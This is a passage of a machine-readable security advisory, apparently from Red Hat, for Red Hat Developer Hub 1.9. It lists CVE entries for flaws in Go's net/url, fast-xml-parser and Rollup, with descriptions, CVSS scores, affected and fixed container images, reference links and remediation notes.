"name": "Improper Validation of Syntactic Correctness of Input"
},
"discovery_date": "2026-03-06T22:02:11.567841+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445356"
}
],
"notes": [
{
"category": "description",
"text": "The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "net/url: Incorrect parsing of IPv6 host literals in net/url",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25679"
},
{
"category": "external",
"summary": "RHBZ#2445356",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25679",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679"
},
{
"category": "external",
"summary": "https://go.dev/cl/752180",
"url": "https://go.dev/cl/752180"
},
{
"category": "external",
"summary": "https://go.dev/issue/77578",
"url": "https://go.dev/issue/77578"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk",
"url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4601",
"url": "https://pkg.go.dev/vuln/GO-2026-4601"
}
],
"release_date": "2026-03-06T21:28:14.211000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "net/url: Incorrect parsing of IPv6 host literals in net/url"
},
{
"cve": "CVE-2026-25896",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2026-02-20T22:01:59.622413+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2441501"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in fast-xml-parser. A remote attacker can exploit this vulnerability by providing a specially crafted XML input. The system incorrectly interprets a dot in a DOCTYPE entity name as a regular expression wildcard during processing. This allows the attacker to bypass security measures and inject malicious scripts, resulting in Cross-Site Scripting (XSS) when the parsed output is displayed to users.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "fast-xml-parser: fast-xml-parser: Cross-Site Scripting (XSS) due to improper DOCTYPE entity handling",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw has been assessed as IMPORTANT for Red Hat products. This vulnerability arises when the parsed XML output is subsequently rendered to users which requires the interaction of the user. The impact of this flaw is also limited to the user\u0027s browser context.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25896"
},
{
"category": "external",
"summary": "RHBZ#2441501",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441501"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25896",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25896"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25896",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25896"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/943ef0eb1b2d3284e72dd74f44a042ee9f07026e",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/943ef0eb1b2d3284e72dd74f44a042ee9f07026e"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/ddcd0acf26ddd682cb0dc15a2bd6aa3b96bb1e69",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/ddcd0acf26ddd682cb0dc15a2bd6aa3b96bb1e69"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.5",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.5"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-m7jm-9gc2-mpf2",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-m7jm-9gc2-mpf2"
}
],
"release_date": "2026-02-20T20:57:48.074000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "fast-xml-parser: fast-xml-parser: Cross-Site Scripting (XSS) due to improper DOCTYPE entity handling"
},
{
"cve": "CVE-2026-26278",
"cwe": {
"id": "CWE-776",
"name": "Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)"
},
"discovery_date": "2026-02-19T21:03:33.363864+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2441120"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw was found in fast-xml-parser. A remote attacker can exploit this vulnerability by providing a specially crafted, small XML input. This input can force the XML parser to perform an unlimited amount of entity expansion, consuming excessive resources. This can lead to the application freezing for an extended period, resulting in a Denial of Service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "fast-xml-parser: fast-xml-parser: Denial of Service via unlimited XML entity expansion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26278"
},
{
"category": "external",
"summary": "RHBZ#2441120",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441120"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26278",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26278"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26278",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26278"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/910dae5be2de2955e968558fadf6e8f74f117a77",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/910dae5be2de2955e968558fadf6e8f74f117a77"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.6",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.6"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jmr7-xgp7-cmfj",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jmr7-xgp7-cmfj"
}
],
"release_date": "2026-02-19T19:40:55.842000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "fast-xml-parser: fast-xml-parser: Denial of Service via unlimited XML entity expansion"
},
{
"cve": "CVE-2026-27606",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-02-25T04:01:24.449922+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442530"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Rollup, a JavaScript module bundler. Insecure file name sanitization in the core engine allows an attacker to control output filenames, potentially through command-line interface (CLI) inputs, manual chunk aliases, or malicious plugins. By using directory traversal sequences (`../`), an attacker can overwrite files anywhere on the host filesystem where the build process has write permissions. This vulnerability can lead to persistent remote code execution (RCE) by overwriting critical system or user configuration files.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "rollup: Rollup: Remote Code Execution via Path Traversal Vulnerability",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "RHBZ#2442530",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442530"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27606",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27606"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2",
"url": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e",
"url": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3",
"url": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v2.80.0",
"url": "https://github.com/rollup/rollup/releases/tag/v2.80.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v3.30.0",
"url": "https://github.com/rollup/rollup/releases/tag/v3.30.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v4.59.0",
"url": "https://github.com/rollup/rollup/releases/tag/v4.59.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc",
"url": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc"
}
],
"release_date": "2026-02-25T02:08:06.682000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "rollup: Rollup: Remote Code Execution via Path Traversal Vulnerability"
},
{
"cve": "CVE-2026-27942",
"cwe": {
"id": "CWE-776",
"name": "Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)"
},
"discovery_date": "2026-02-26T03:01:53.367202+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442938"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in fast-xml-parser. A user can exploit this flaw by processing specially crafted XML data with the XML builder when the `preserveOrder` option is enabled. This can lead to a stack overflow, causing the application to crash and resulting in a Denial of Service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "fast-xml-parser: fast-xml-parser: Stack overflow leads to Denial of Service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The flaw affects the XML builder component of the fast-xml-parser library and is triggered only when the preserveOrder option is explicitly enabled. In Red Hat\u2013shipped configurations, this option is not enabled by default, and the vulnerable code path is therefore not exercised under typical deployments.\nThe underlying issue results in uncontrolled recursion leading to a stack overflow condition, which causes the application to terminate unexpectedly. While this can be triggered via crafted input, the impact is limited strictly to denial of service (DoS) and does not provide a mechanism for arbitrary code execution, privilege escalation, or data disclosure.\nFurthermore, exploitation requires that the affected application processes attacker-controlled XML input through the XML builder functionality with the specific vulnerable configuration enabled. This significantly reduces the attack surface and introduces environmental constraints not considered in the generalized NVD scoring.\n\nGiven the absence of confidentiality and integrity impact, the requirement for non-default configuration, and the limitation of the impact to process termination, Red Hat considers the practical risk to be lower than the NVD assessment. As such, this issue is classified as Moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27942"
},
{
"category": "external",
"summary": "RHBZ#2442938",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442938"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27942",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27942"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27942",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27942"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/c13a961910f14986295dd28484eee830fa1a0e8a",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/c13a961910f14986295dd28484eee830fa1a0e8a"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/pull/791",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/pull/791"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-fj3w-jwp8-x2g3",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-fj3w-jwp8-x2g3"
}
],
"release_date": "2026-02-26T01:22:11.383000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, configure applications using the `fast-xml-parser` XML builder to set the `preserveOrder` option to `false`. Alternatively, ensure that all XML input data is thoroughly validated before being passed to the builder to prevent the processing of malicious or malformed content.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "fast-xml-parser: fast-xml-parser: Stack overflow leads to Denial of Service"
},
{
"cve": "CVE-2026-33186",
"cwe": {
"id": "CWE-551",
"name": "Incorrect Behavior Order: Authorization Before Parsing and Canonicalization"
},
"discovery_date": "2026-03-20T23:02:27.802640+00:00",
"flags": [
{
